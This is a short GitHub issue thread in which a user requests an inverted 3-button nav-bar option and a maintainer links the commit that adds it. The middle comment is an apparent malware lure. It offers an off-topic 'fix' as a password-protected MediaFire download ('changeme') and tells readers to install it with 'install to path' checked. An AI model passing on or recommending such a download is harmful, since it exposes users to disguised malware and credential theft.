### ISSUE TITLE
Invert 3 button nav-bar option.

### ISSUE THREAD

**Issue by Czernobo** [TheXPerienceProject/Manifest#11]
Not really a bug, but a feature request if possible.

Was wondering if you can add the option to invert the 3 button nav-bar.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Klozz** [comment]
your request has been addressed and was added https://github.com/TheXPerienceProject/android_frameworks_base/commit/11cb5328936a8dc24bda98a1adef9238c84dec7c

I will close your issue
